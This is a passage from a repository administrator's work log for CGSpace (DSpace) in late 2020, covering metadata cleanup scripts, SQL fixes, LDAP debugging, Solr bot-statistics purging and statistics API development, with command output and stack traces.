+$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=200' User-Agent:'curl' > /tmp/wle-trade-off-page3.xml
+
+
$ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page1.xml >> /tmp/ids.txt
+$ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page2.xml >> /tmp/ids.txt
+$ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page3.xml >> /tmp/ids.txt
+$ sort -u /tmp/ids.txt > /tmp/ids-sorted.txt
+$ grep -oE '[0-9]+/[0-9]+' /tmp/ids.txt > /tmp/handles.txt
+
  • Now I have all the handles for the matching items and I can use the REST API to get each item’s PDFs… (a rough sketch of that is below, after this list)
  • Add Foreign, Commonwealth and Development Office, United Kingdom to the controlled vocabulary for sponsors on CGSpace
      • This is the new name for DFID as of 2020-09-01
      • We will continue using DFID for older items
+
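
A rough sketch of the REST API loop for finding the PDFs, assuming the DSpace 5 REST API’s /rest/handle/{handle} and /rest/items/{id}/bitstreams endpoints and that each bitstream object exposes bundleName and retrieveLink fields:

$ while read -r handle; do item_id=$(http "https://cgspace.cgiar.org/rest/handle/$handle" | jq '.id'); http "https://cgspace.cgiar.org/rest/items/$item_id/bitstreams" | jq -r '.[] | select(.bundleName=="ORIGINAL") | .retrieveLink'; done < /tmp/handles.txt

The retrieveLink values are relative paths, so the site’s base URL would still need to be prepended before downloading them.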

2020-08-22

  • Peter noticed that the AReS data was outdated, and I see in the admin dashboard that it hasn’t been updated since 2020-07-21
      • I initiated a re-indexing and I see from the CGSpace logs that it is indeed running
  • Margarita from CCAFS asked for help adding a new user to their submission and approvers groups
      • I told them to log in using the LDAP login first so that the e-person gets created
  • I manually renamed a few dozen of the stupid “a-ILRI submitters” groups that had the “a-” prefix on CGSpace
      • For what it’s worth, we had asked Sisay to do this over a year ago and he never did
      • Also, we have two CCAFS approvers groups: CCAFS approvers and CCAFS approvers1, with each added to about half of the CCAFS collections
      • The group members are the same, so I went through and replaced the CCAFS approvers1 group everywhere manually…
      • I also removed some old CCAFS users from the groups
+

2020-08-27

+
    +
  • I ran the CountryCodeTagger on CGSpace and it was very fast:
  • +
+
$ time chrt -b 0 dspace curate -t countrycodetagger -i all -r - -l 500 -s object | tee /tmp/2020-08-27-countrycodetagger.log
+real    2m7.643s
+user    1m48.740s
+sys     0m14.518s
+$ grep -c added /tmp/2020-08-27-countrycodetagger.log
+46
+
  • I still haven’t created a cron job for it… but it’s good to know that it is very fast when it doesn’t need to add very many country codes (the original run a few weeks ago added 50,000 country codes); a sketch of a possible cron entry is below
      • I wonder how DSpace 6 will perform when it doesn’t need to add all the codes, like after the initial run
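
A sketch of the kind of crontab entry that could run this weekly — the schedule and the DSpace installation path are assumptions:

0 2 * * 1 chrt -b 0 /home/cgspace.cgiar.org/bin/dspace curate -t countrycodetagger -i all -r - -l 500 -s object > /dev/null 2>&1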

September, 2020


2020-09-02

  • Replace Marissa van Epp with Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS
  • The AReS Explorer hasn’t updated its index since 2020-08-22 when I last forced it
      • I restarted it again now and told Moayad that the automatic indexing isn’t working
  • Add Alliance of Bioversity International and CIAT to affiliations on CGSpace
  • Abenet told me that the general search text on AReS doesn’t get reset when you use the “Reset Filters” button
  • I filed an issue on OpenRXV to make some minor edits to the admin UI: https://github.com/ilri/OpenRXV/issues/40
+
    +
  • I ran the country code tagger on CGSpace:
  • +
+
$ time chrt -b 0 dspace curate -t countrycodetagger -i all -r - -l 500 -s object | tee /tmp/2020-09-02-countrycodetagger.log
+...
+real    2m10.516s
+user    1m43.953s
+sys     0m15.192s
+$ grep -c added /tmp/2020-09-02-countrycodetagger.log
+39
+
    +
  • I still need to create a cron job for this…
  • +
  • Sisay and Abenet said they can’t log in with LDAP on DSpace Test (DSpace 6) +
      +
    • I tried and I can’t either… but it is working on CGSpace
    • +
    • The error on DSpace 6 is:
    • +
    +
  • +
+
2020-09-02 12:03:10,666 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=A629116488DCC467E1EA2062A2E2EFD7:ip_addr=92.220.02.201:failed_login:no DN found for user aorth
+
    +
  • I tried to query LDAP directly using the application credentials with ldapsearch and it works:
  • +
+
$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "applicationaccount@cgiarad.org" -W "(sAMAccountName=me)"
+
  • According to the DSpace 6 docs we need to escape commas in our LDAP parameters due to the new configuration system
      • I escaped the commas and restarted DSpace (though technically we shouldn’t need to restart due to the new config system hot reloading configs)
      • Run all system updates on DSpace Test (linode26) and reboot it
      • After the restart LDAP login works…
+

2020-09-03

+
    +
  • Fix some erroneous “review status” fields that Abenet noticed on AReS +
      +
    • I used my fix-metadata-values.py and delete-metadata-values.py scripts with the following input files:
    • +
    +
  • +
+
$ cat 2020-09-03-fix-review-status.csv
+dc.description.version,correct
+Externally Peer Reviewed,Peer Review
+Peer Reviewed,Peer Review
+Peer review,Peer Review
+Peer reviewed,Peer Review
+Peer-Reviewed,Peer Review
+Peer-reviewed,Peer Review
+peer Review,Peer Review
+$ cat 2020-09-03-delete-review-status.csv
+dc.description.version
+Report
+Formally Published
+Poster
+Unrefereed reprint
+$ ./delete-metadata-values.py -i 2020-09-03-delete-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -m 68
+$ ./fix-metadata-values.py -i 2020-09-03-fix-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -t 'correct' -m 68
+
  • Start reviewing 95 items for IITA (20201stbatch)
      • I used my csv-metadata-quality tool to check and fix some low-hanging fruit first
      • This fixed a few unnecessary Unicode characters, excessive whitespace, invalid multi-value separators, and duplicate metadata values
      • Then I looked at the data in OpenRefine and noticed some things:
          • All issue dates use year only, but some have months in the citation so they could be more specific
          • I normalized all the DOIs to use the “https://doi.org” format
          • I fixed a few AGROVOC subjects with a simple GREL: value.replace("GRAINS","GRAIN").replace("SOILS","SOIL").replace("CORN","MAIZE")
          • But there are a few more that are invalid that she will have to look at
          • I uploaded the items to DSpace Test and it was apparently successful, but I got these errors on the console:
+
Thu Sep 03 12:26:33 CEST 2020 | Query:containerItem:ea7a2648-180d-4fce-bdc5-c3aa2304fc58
+Error while updating
+java.lang.NullPointerException
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl$5.visit(SourceFile:1131)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.visitEachStatisticShard(SourceFile:212)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1104)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1093)
+        at org.dspace.statistics.StatisticsLoggingConsumer.consume(SourceFile:104)
+        at org.dspace.event.BasicDispatcher.consume(BasicDispatcher.java:177)
+        at org.dspace.event.BasicDispatcher.dispatch(BasicDispatcher.java:123)
+        at org.dspace.core.Context.dispatchEvents(Context.java:455)
+        at org.dspace.core.Context.commit(Context.java:424)
+        at org.dspace.core.Context.complete(Context.java:380)
+        at org.dspace.app.bulkedit.MetadataImport.main(MetadataImport.java:1399)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • There are more in the DSpace log so I will raise it with Atmire immediately
  • +
+

2020-09-04

+ +
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^(http://)?www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/([[:digit:]]+)\.html$', 'https://www.cifor.org/knowledge/publication/\3') WHERE metadata_field_id=219 AND text_value ~ 'www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/[[:digit:]]+';
+dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/library/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/library/[[:digit:]]+/?';
+dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/pid/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/pid/[[:digit:]]+';
+
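A minimal sketch (assuming psycopg2 and the same local database credentials used elsewhere in these notes) of how one could preview which URLs the UPDATEs above would touch before running them:

#!/usr/bin/env python3
# Preview the CIFOR URL rewrites before running the SQL UPDATEs above.
# Sketch only: assumes psycopg2 and local "dspace" database credentials.
import re
import psycopg2

# The same three patterns as the regexp_replace() statements
patterns = [
    (re.compile(r'^(http://)?www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/(\d+)\.html$'),
     r'https://www.cifor.org/knowledge/publication/\3'),
    (re.compile(r'^https?://www\.cifor\.org/library/(\d+)/?$'),
     r'https://www.cifor.org/knowledge/publication/\1'),
    (re.compile(r'^https?://www\.cifor\.org/pid/(\d+)/?$'),
     r'https://www.cifor.org/knowledge/publication/\1'),
]

conn = psycopg2.connect('dbname=dspace user=dspace password=fuuu')
cursor = conn.cursor()
cursor.execute(r"SELECT text_value FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ 'cifor\.org'")
for (url,) in cursor.fetchall():
    for pattern, replacement in patterns:
        if pattern.match(url):
            print(f'{url} -> {pattern.sub(replacement, url)}')
conn.close()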
    +
  • I did some cleanup on the author affiliations of the IITA data against our 2019-04 list using reconcile-csv and OpenRefine: +
      +
    • $ lein run ~/src/git/DSpace/2019-04-08-affiliations.csv name id
    • +
    • I always forget how to copy the reconciled values in OpenRefine, but you need to make a new column and populate it using this GREL: if(cell.recon.matched, cell.recon.match.name, value)
    • +
    +
  • +
  • I mapped one duplicate from the CIFOR Archives and re-uploaded the 94 IITA items to a new collection on DSpace Test
  • +
+

2020-09-08

+
    +
  • I noticed that the “share” link in AReS wasn’t working properly because it excludes the “explorer” part of the URI
  • +
+

AReS share link broken

+
    +
  • I filed an issue on GitHub: https://github.com/ilri/OpenRXV/issues/41
  • +
  • I uploaded the 94 IITA items that I had been working on last week to CGSpace
  • +
  • RTB emailed to ask why they are getting HTTP 503 errors during harvesting to the RTB WordPress website +
      +
    • From the screenshot I can see they are requesting URLs like this:
    • +
    +
  • +
+
https://cgspace.cgiar.org/bitstream/handle/10568/82745/Characteristics-Silage.JPG
+
    +
  • So they end up getting rate limited due to the XMLUI rate limits +
      +
    • I told them to use the REST API bitstream retrieve links, because we don’t have any rate limits there
    • +
    +
  • +
+

2020-09-09

+
    +
  • Wire up the systemd service/timer for the CGSpace Country Code Tagger curation task in the Ansible infrastructure scripts +
      +
    • For now it won’t work on DSpace 6 because the curation task invocation needs to be slightly different (minus the -l parameter) and for some reason the task isn’t working on DSpace Test (version 6) right now
    • +
    • I added DSpace 6 support to the playbook templates…
    • +
    +
  • +
  • Run system updates on DSpace Test (linode26), re-deploy the DSpace 6 test branch, and reboot the server +
      +
    • After rebooting I deleted old copies of the cgspace-java-helpers JAR in the DSpace lib directory and then the curation worked
    • +
    • To my great surprise the curation worked (and completed, albeit a few times slower) on my local DSpace 6 environment as well:
    • +
    +
  • +
+
$ ~/dspace63/bin/dspace curate -t countrycodetagger -i all -s object
+

2020-09-10

+
    +
  • I checked the country code tagger on CGSpace and DSpace Test and it ran fine from the systemd timer last night… w00t
  • +
  • I started looking at Peter’s changes to the CGSpace regions that were proposed in 2020-07 +
      +
    • The changes will be:
    • +
    +
  • +
+
$ cat 2020-09-10-fix-cgspace-regions.csv
+cg.coverage.region,correct
+EAST AFRICA,EASTERN AFRICA
+WEST AFRICA,WESTERN AFRICA
+SOUTHEAST ASIA,SOUTHEASTERN ASIA
+SOUTH ASIA,SOUTHERN ASIA
+AFRICA SOUTH OF SAHARA,SUB-SAHARAN AFRICA
+NORTH AFRICA,NORTHERN AFRICA
+WEST ASIA,WESTERN ASIA
+SOUTHWEST ASIA,SOUTHWESTERN ASIA
+$ ./fix-metadata-values.py -i 2020-09-10-fix-cgspace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d -n
+Connected to database.
+Would fix 12227 occurences of: EAST AFRICA
+Would fix 7996 occurences of: WEST AFRICA
+Would fix 3515 occurences of: SOUTHEAST ASIA
+Would fix 3443 occurences of: SOUTH ASIA
+Would fix 1134 occurences of: AFRICA SOUTH OF SAHARA
+Would fix 357 occurences of: NORTH AFRICA
+Would fix 81 occurences of: WEST ASIA
+Would fix 3 occurences of: SOUTHWEST ASIA
+
    +
  • I think we need to wait for the web team, though, as they need to update their mappings +
      +
    • Not to mention that we’ll need to give WLE and CCAFS time to update their harvesters as well… hmmm
    • +
    +
  • +
  • Looking at the top user agents active on CGSpace in 2020-08 and I see: +
      +
    • Delphi 2009: 235353 (this is GARDIAN harvester I guess, as the IP is in Greece)
    • +
    • Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98): 57004 (IP is 18.196.100.94, and the requests seem to be for CTA’s content)
    • +
    • RTB website BOT: 12282
    • +
    • ILRI Livestock Website Publications importer BOT: 9393
    • +
    +
  • +
  • Shit, I meant to add Delphi to the DSpace spider agents list last month but I guess I didn’t commit the change
  • +
  • HTTrack is in the agents list so I’m not sure why DSpace registers a hit from that request
  • +
  • Also, I am surprised to see the RTB and ILRI bots here because they have “BOT” in the name and that should also be dropped
  • +
  • I also see hits from curl and Java/1.8.0_66 and Apache-HttpClient so WTF… those are supposed to be dropped by the default agents list
  • +
  • Some IP 2607:f298:5:101d:f816:3eff:fed9:a484 made 9,000 requests with the RI/1.0 user agent this year… +
      +
    • That’s on DreamHost…?
    • +
    +
  • +
  • I purged 448658 hits from these agents and added Delphi to our local agents override for Solr as well as to Tomcat’s Crawler Session Manager Valve so that it forces them to re-use a single session
  • +
  • I made a pull request on the COUNTER-Robots project for the Daum robot: https://github.com/atmire/COUNTER-Robots/pull/38 +
      +
    • This bot made 8,000 requests to CGSpace this year
    • +
    • I purged about 20,000 total requests from this bot from our Solr stats for the last few years
    • +
    +
  • +
+

2020-09-11

+
    +
  • Peter noticed that an export from AReS shows some items with zero views and others with zero views/downloads, but on CGSpace and in the statistics API there are views/downloads +
      +
    • I need to ask Moayad…
    • +
    +
  • +
+

2020-09-12

+
    +
  • Carlos Tejo from the LandPortal emailed to ask for advice about integrating their LandVoc vocabulary, which is a subset of AGROVOC, into DSpace + +
  • +
  • Redeploy the latest 5_x-prod branch on CGSpace, re-run the latest Ansible DSpace playbook, run all system updates, and reboot the server (linode18) +
      +
    • This will bring the latest bot lists for Solr and Tomcat
    • +
    • I had to restart Tomcat 7 three times before all Solr statistics cores came up OK
    • +
    +
  • +
  • Leroy and Carol from CIAT/Bioversity were asking for information about posting to the CGSpace REST API from Sharepoint +
      +
    • I told them that we don’t allow this yet, but that we need to check in the future whether content can be posted to a workflow
    • +
    +
  • +
+

2020-09-15

+
    +
  • Charlotte from Altmetric said they had issues parsing the XML file I sent them last month +
      +
    • I told them that it was mimicking the same format that they had sent me (fourteen pages of XML responses concatenated together)!
    • +
    +
  • +
  • A few days ago IWMI asked us if we can add a new field on CGSpace for their library identifier +
      +
    • The IDs look like this: H049940
    • +
    • I suggested that we use cg.identifier.iwmilibrary
    • +
    • I added it to the input forms and push it to the 5_x-prod and 6.x branches and will re-deploy it in the next few days
    • +
    +
  • +
  • Abenet asked me to import sixty-nine (69) CIP Annual Reports to CGSpace +
      +
    • I looked at the data in OpenRefine and it is very good quality
    • +
    • I only added descriptions to the filename field so that SAFBuilder will add them to the bitstreams on import:
    • +
    +
  • +
+
value + "__description:" + cells["dc.type"].value
+
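For reference, a rough Python equivalent of that GREL; this is only a sketch and the "filename" column name is an assumption about the SAFBuilder CSV:

#!/usr/bin/env python3
# Append "__description:<dc.type>" to each filename so SAFBuilder sets it as
# the bitstream description (sketch; column names are assumptions).
import csv

with open('cip-reports.csv', newline='') as infile, \
        open('cip-reports-described.csv', 'w', newline='') as outfile:
    reader = csv.DictReader(infile)
    writer = csv.DictWriter(outfile, fieldnames=reader.fieldnames)
    writer.writeheader()
    for row in reader:
        row['filename'] = f"{row['filename']}__description:{row['dc.type']}"
        writer.writerow(row)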
    +
  • Then I created a SAF bundle with SAFBuilder:
  • +
+
$ ./safbuilder.sh -c ~/Downloads/cip-annual-reports/cip-reports.csv
+
    +
  • And imported them into my local test instance of CGSpace:
  • +
+
$ ~/dspace/bin/dspace import -a -e y.arrr@cgiar.org -m /tmp/2020-09-15-cip-annual-reports.map -s ~/Downloads/cip-annual-reports/SimpleArchiveFormat
+
    +
  • Then I uploaded them to CGSpace
  • +
+

2020-09-16

+
    +
  • Looking further into Carlos Tejo’s question about integrating LandVoc (the AGROVOC subset) into DSpace +
      +
    • I see that you can actually get LandVoc concepts directly from AGROVOC’s SPARQL, for example with this query
    • +
    +
  • +
+

AGROVOC LandVoc SPARQL

+
    +
  • So maybe we can query AGROVOC directly using a similar method to DSpace-CRIS’s GettyAuthority
  • +
  • I wired up DSpace-CRIS’s VIAFAuthority to see how authorities for auto suggested names get stored +
      +
    • After submission you can see the item’s VIAF identifier:
    • +
    +
  • +
+

VIAF authority

+
    +
  • And this identifier is the ID on VIAF, pretty cool!
  • +
+

VIAF entry for Charles Darwin

+
    +
  • I did a similar test with the Getty Thesaurus of Geographic Names (TGN) and it stores the concept URI in the authority:
  • +
+

TGNAuthority

+
    +
  • But the authority values are not exposed anywhere as metadata… +
      +
    • I need to play with it a bit more I guess…
    • +
    +
  • +
  • The nice thing is that the Getty example from DSpace-CRIS uses SPARQL as well, and the TGN authority extends it +
      +
    • We could use a similar model for AGROVOC/LandVoc very easily
    • +
    +
  • +
+

2020-09-17

+
    +
  • Maria from Bioversity asked about the ORCID identifier for one of her colleagues, which seems to have been removed from our list +
      +
    • I re-added it to our controlled vocabulary and added the identifier to fifty-one of his existing items on CGSpace using my script:
    • +
    +
  • +
+
$ cat 2020-09-17-add-bioversity-orcids.csv
+dc.contributor.author,cg.creator.id
+"Etten, Jacob van","Jacob van Etten: 0000-0001-7554-2558"
+"van Etten, Jacob","Jacob van Etten: 0000-0001-7554-2558"
+$ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dspace -u dspace -p 'dom@in34sniper'
+
    +
  • I sent a follow-up message to Atmire to look into the two remaining issues with the DSpace 6 upgrade +
      +
    • First is the fact that we have zero results in our Listings and Reports, for any search
    • +
    • Second is the error we get during CSV imports
    • +
    +
  • +
  • Help Natalia and Cathy from Bioversity-CIAT with their OpenSearch query on “trade offs” again +
      +
    • They wanted to build a search query with multiple filters (type, crpsubject, status) and the general query “trade offs”
    • +
    • I found a great reference for DSpace’s OpenSearch syntax (albeit in Finnish, but the example URLs show the syntax clearly)
    • +
    • We can use quotes and AND and OR and even group search parameters with parentheses!
    • +
    • So now I built a query for Natalia which uses these (showing without URL encoding so you can see the syntax):
    • +
    +
  • +
+
https://cgspace.cgiar.org/open-search/discover?query=type:"Journal Article" AND status:"Open Access" AND crpsubject:"Water, Land and Ecosystems" AND "tradeoffs"&rpp=100
+
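A quick sketch of running the same query from Python, letting requests handle the URL encoding (the response is an XML feed):

#!/usr/bin/env python3
# Fetch the OpenSearch query above with proper URL encoding (sketch).
import requests

query = ('type:"Journal Article" AND status:"Open Access" AND '
         'crpsubject:"Water, Land and Ecosystems" AND "tradeoffs"')
response = requests.get(
    'https://cgspace.cgiar.org/open-search/discover',
    params={'query': query, 'rpp': 100},
)
print(response.status_code)
print(response.text[:500])  # XML feed listing the matching items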
    +
  • I noticed that my move-collections.sh script didn’t work on DSpace 6 because of the change from IDs to UUIDs, so I modified it to quote the collection resource_id parameters in the PostgreSQL query
  • +
+

2020-09-18

+
    +
  • Help Natalia with her WLE “tradeoffs” search query again…
  • +
+

2020-09-20

+
    +
  • Deploy latest 5_x-prod branch on CGSpace, run all system updates, and reboot the server +
      +
    • To my great surprise, all the Solr statistics cores came up correctly after reboot
    • +
    +
  • +
  • Deploy latest 6_x-dev branch on DSpace Test, run all system updates and reboot the server
  • +
+

2020-09-22

+
    +
  • Abenet sent some feedback about AReS +
      +
    • The item views and downloads are still incorrect
    • +
    • I looked in the server’s API logs and there are no errors, and the database has many more views/downloads:
    • +
    +
  • +
+
dspacestatistics=# SELECT SUM(views) FROM items;
+   sum
+----------
+ 15714024
+(1 row)
+
+dspacestatistics=# SELECT SUM(downloads) FROM items;
+   sum
+----------
+ 13979911
+(1 row)
+
    +
  • I deleted “Report” from twelve items that had it in their peer review field:
  • +
+
dspace=# BEGIN;
+BEGIN
+dspace=# DELETE FROM metadatavalue WHERE text_value='Report' AND resource_type_id=2 AND metadata_field_id=68;
+DELETE 12
+dspace=# COMMIT;
+
    +
  • I added all CG center- and CRP-specific subject fields and mapped them to dc.subject in AReS
  • +
  • After forcing a re-harvesting now the review status is much cleaner and the missing subjects are available
  • +
  • Last week Natalia from CIAT had asked me to download all the PDFs for a certain query: +
      +
    • items with status “Open Access”
    • +
    • items with type “Journal Article”
    • +
    • items containing any of the following words: water land and ecosystems & trade offs
    • +
    • The resulting OpenSearch query is: https://cgspace.cgiar.org/open-search/discover?query=type:"Journal Article" AND status:"Open Access" AND Water Land Ecosystems trade offs&rpp=1
    • +
    • There were 241 results with a total of 208 PDFs, which I downloaded with my get-wle-pdfs.py script and shared to her via bashupload.com
    • +
    +
  • +
+

2020-09-23

+
    +
  • Peter said he was having problems submitting items to CGSpace +
      +
    • On a hunch I looked at the PostgreSQL locks in Munin and indeed the normal issue with locks is back (though I haven’t seen it in a few months?)
    • +
    +
  • +
+

PostgreSQL connections day

+
    +
  • Instead of restarting Tomcat I restarted the PostgreSQL service and then Peter said he was able to submit the item…
  • +
  • Experiment with doing direct queries for items in the dspace-statistics-api +
      +
    • I tested querying a handful of item UUIDs with a date range and returning their hits faceted by id
    • +
    • Assuming a list of item UUIDs was posted to the REST API we could prepare them for a Solr query by joining them into a string with “OR” and escaping the hyphens:
    • +
    +
  • +
+
...
+item_ids = ['0079470a-87a1-4373-beb1-b16e3f0c4d81', '007a9df1-0871-4612-8b28-5335982198cb']
+item_ids_str = ' OR '.join(item_ids).replace('-', '\-')
+...
+solr_query_params = {
+    "q": f"id:({item_ids_str})",
+    "fq": "type:2 AND isBot:false AND statistics_type:view AND time:[2020-01-01T00:00:00Z TO 2020-09-02T00:00:00Z]",
+    "facet": "true",
+    "facet.field": "id",
+    "facet.mincount": 1,
+    "facet.limit": 1,
+    "facet.offset": 0,
+    "stats": "true",
+    "stats.field": "id",
+    "stats.calcdistinct": "true",
+    "shards": shards,
+    "rows": 0,
+    "wt": "json",
+}
+
    +
  • The date range format for Solr is important, but it seems we only need to add T00:00:00Z to the normal ISO 8601 YYYY-MM-DD strings
  • +
+
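Here is a runnable version of that snippet, as a sketch without the statistics sharding and with example UUIDs only (the Solr URL is the same local one used elsewhere in these notes):

#!/usr/bin/env python3
# Send the faceted query above to the statistics core and print per-item hits
# (sketch; no shards parameter, example UUIDs only).
import requests

item_ids = ['0079470a-87a1-4373-beb1-b16e3f0c4d81', '007a9df1-0871-4612-8b28-5335982198cb']
item_ids_str = ' OR '.join(item_ids).replace('-', r'\-')

solr_query_params = {
    'q': f'id:({item_ids_str})',
    'fq': 'type:2 AND isBot:false AND statistics_type:view AND time:[2020-01-01T00:00:00Z TO 2020-09-02T00:00:00Z]',
    'facet': 'true',
    'facet.field': 'id',
    'facet.mincount': 1,
    'rows': 0,
    'wt': 'json',
}

response = requests.get('http://localhost:8083/solr/statistics/select', params=solr_query_params)
# facet_fields returns a flat list of alternating id/count pairs
print(response.json()['facet_counts']['facet_fields']['id'])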

2020-09-25

+
    +
  • I did some more work on the dspace-statistics-api and finalized the support for sending a POST to /items:
  • +
+
$ curl -s -d @request.json https://dspacetest.cgiar.org/rest/statistics/items | json_pp
+{
+   "currentPage" : 0,
+   "limit" : 10,
+   "statistics" : [
+      {
+         "downloads" : 3329,
+         "id" : "b2c1bbfd-65b0-438c-9e49-d271c49b2696",
+         "views" : 1565
+      },
+      {
+         "downloads" : 3797,
+         "id" : "f44cf173-2344-4eb2-8f00-ee55df32c76f",
+         "views" : 48
+      },
+      {
+         "downloads" : 11064,
+         "id" : "8542f9da-9ce1-4614-abf4-f2e3fdb4b305",
+         "views" : 26
+      },
+      {
+         "downloads" : 6782,
+         "id" : "2324aa41-e9de-4a2b-bc36-16241464683e",
+         "views" : 19
+      },
+      {
+         "downloads" : 48,
+         "id" : "0fe573e7-042a-4240-a4d9-753b61233908",
+         "views" : 12
+      },
+      {
+         "downloads" : 0,
+         "id" : "000e61ca-695d-43e5-9ab8-1f3fd7a67a32",
+         "views" : 4
+      },
+      {
+         "downloads" : 0,
+         "id" : "000dc7cd-9485-424b-8ecf-78002613cc87",
+         "views" : 1
+      },
+      {
+         "downloads" : 0,
+         "id" : "000e1616-3901-4431-80b1-c6bc67312d8c",
+         "views" : 1
+      },
+      {
+         "downloads" : 0,
+         "id" : "000ea897-5557-49c7-9f54-9fa192c0f83b",
+         "views" : 1
+      },
+      {
+         "downloads" : 0,
+         "id" : "000ec427-97e5-4766-85a5-e8dd62199ab5",
+         "views" : 1
+      }
+   ],
+   "totalPages" : 13
+}
+
    +
  • I deployed it on DSpace Test and sent a note to Salem so he can test it
  • +
  • I still need to add tests…
  • +
  • After that I will probably tag it as version 1.3.0
  • +
+

2020-09-25

+
    +
  • Atmire responded with some notes about the issues we’re having with CUA and L&R on DSpace Test +
      +
    • They think they have found the reason the issues are happening…
    • +
    +
  • +
+

2020-09-29

+
    +
  • Atmire sent a pull request yesterday with a potential fix for the Listings and Reports (L&R) issue +
      +
    • I tried to build it on DSpace Test but I got an HTTP 401 Unauthorized for the artifact
    • +
    • I sent them a message…
    • +
    +
  • +
+

2020-09-30

+
    +
  • Experiment with re-creating IWMI’s “Monthly Abstract” type report with an AReS template +
      +
    • The template library for reports is: https://docxtemplater.com
    • +
    • Conditions start with a pound and end with a slash: {#items} {/items}
    • +
    • An inverted section begins with a caret (hat) and ends with a slash: {^citation} No citation{/citation}
    • +
    • I found a bug: templates with a space in the file name don’t download
    • +
    • It would be nice if we could use angular expressions to make more complex templates +
        +
      • Ability to iterate over authors (to change the separator)
      • +
      • Ability to get item number in a loop (for a list)
      • +
      • To do things like checking if a CRP is “WLE”
      • +
      +
    • +
    +
  • +

October, 2020

+ +
+

2020-10-06

+
    +
  • Add tests for the new /items POST handlers to the DSpace 6.x branch of my dspace-statistics-api + +
  • +
  • Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump +
      +
    • During the FlywayDB migration I got an error:
    • +
    +
  • +
+
2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Batch entry 0 update public.bitstreamformatregistry set description='Electronic publishing', internal='FALSE', mimetype='application/epub+zip', short_description='EPUB', support_level=1 where bitstream_format_id=78 was aborted: ERROR: duplicate key value violates unique constraint "bitstreamformatregistry_short_description_key"
+  Detail: Key (short_description)=(EPUB) already exists.  Call getNextException to see other errors in the batch.
+2020-10-06 21:36:04,138 WARN  org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: 23505
+2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: duplicate key value violates unique constraint "bitstreamformatregistry_short_description_key"
+  Detail: Key (short_description)=(EPUB) already exists.
+2020-10-06 21:36:04,142 ERROR org.hibernate.engine.jdbc.batch.internal.BatchingBatch @ HHH000315: Exception executing batch [could not execute batch]
+2020-10-06 21:36:04,143 ERROR org.dspace.storage.rdbms.DatabaseRegistryUpdater @ Error attempting to update Bitstream Format and/or Metadata Registries
+org.hibernate.exception.ConstraintViolationException: could not execute batch
+	at org.hibernate.exception.internal.SQLStateConversionDelegate.convert(SQLStateConversionDelegate.java:129)
+	at org.hibernate.exception.internal.StandardSQLExceptionConverter.convert(StandardSQLExceptionConverter.java:49)
+	at org.hibernate.engine.jdbc.spi.SqlExceptionHelper.convert(SqlExceptionHelper.java:124)
+	at org.hibernate.engine.jdbc.batch.internal.BatchingBatch.performExecution(BatchingBatch.java:122)
+	at org.hibernate.engine.jdbc.batch.internal.BatchingBatch.doExecuteBatch(BatchingBatch.java:101)
+	at org.hibernate.engine.jdbc.batch.internal.AbstractBatchImpl.execute(AbstractBatchImpl.java:161)
+	at org.hibernate.engine.jdbc.internal.JdbcCoordinatorImpl.executeBatch(JdbcCoordinatorImpl.java:207)
+	at org.hibernate.engine.spi.ActionQueue.executeActions(ActionQueue.java:390)
+	at org.hibernate.engine.spi.ActionQueue.executeActions(ActionQueue.java:304)
+	at org.hibernate.event.internal.AbstractFlushingEventListener.performExecutions(AbstractFlushingEventListener.java:349)
+	at org.hibernate.event.internal.DefaultFlushEventListener.onFlush(DefaultFlushEventListener.java:56)
+	at org.hibernate.internal.SessionImpl.flush(SessionImpl.java:1195)
+	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
